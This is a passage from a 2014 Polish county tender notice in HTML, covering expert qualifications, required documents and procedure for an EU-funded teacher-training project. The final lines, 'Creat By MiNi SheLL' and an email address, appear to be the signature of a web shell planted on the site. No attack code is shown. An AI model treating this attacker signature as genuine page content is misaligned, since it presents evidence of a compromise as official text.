d) zrealizowanie min. 5 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu diagnozy potrzeb rodziców i uczniów, budowania autorytetu nauczyciela i rodzica, form działań integracyjnych, diagnozowania potrzeb uczniów 
i rodziców.
Zadanie nr 8 - Ekspert nr 2. Minimalna ilość osób: 1.
a) wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w rozumieniu przepisów rozporządzenia MEN z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia  lub ukończonego zakładu kształcenia nauczycieli lub wykształcenie wyższe magisterskie na kierunku psychologia w specjalności odpowiadającej prowadzonym zajęciom oraz posiadanie przygotowania pedagogicznego 
w rozumieniu ww. przepisów;
b) ukończenie co najmniej jednego kursu lub innej formy doskonalenia zawodowego 
z zakresu komunikacji interpersonalnej, radzenia sobie w sytuacjach stresowych, asertywności;
c) minimum 3 letnie doświadczenie w pracy na stanowisku wymagającym kwalifikacji pedagogicznych (np. nauczyciela / pedagoga / psychologa) lub w realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej;
d) zrealizowanie min. 5 form doskonalenia nauczycieli (np.: warsztaty, wykłady na konferencji, kursie kwalifikacyjnym / studiach podyplomowych, szkolenie rady pedagogicznej) z zakresu komunikacji interpersonalnej, radzenia sobie w sytuacjach stresowych, asertywności;
e) ukończenie studiów podyplomowych z zakresu komunikacji interpersonalnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty oraz w uzasadnionych przypadkach: pełnomocnictwo dla osób podpisujących ofertę; dokument ustanawiający pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia, pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umownego terminu realizacji przedmiotu zamówienia w przypadku zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
2. Zamawiający przewiduje możliwość zmiany osoby realizującej zamówienie (tzw. eksperta). Zmiana osoby realizującej zamówienie jest możliwa na wniosek Wykonawcy, jedynie w uzasadnionych obiektywnych okolicznościach, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby pod warunkiem, że osoba ta będzie spełniała wymagania określone w SIWZ. 3. Wszelkie zmiany umowy wymagają formy pisemnego aneksu - pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.wagrowiec.pl/?c=179<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, 62-100 Wągrowiec, ul. Kościuszki 15, pok. 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2014 godzina 09:00, miejsce: Starostwo Powiatowe w Wągrowcu, 62-100 Wągrowiec, ul. Kościuszki 15, pok. 13a - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. System wsparcia szkół i przedszkoli w Powiecie Wągrowieckim - nowoczesne doskonalenie nauczycieli, POKL.03.05.00-178/12. Projekt współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com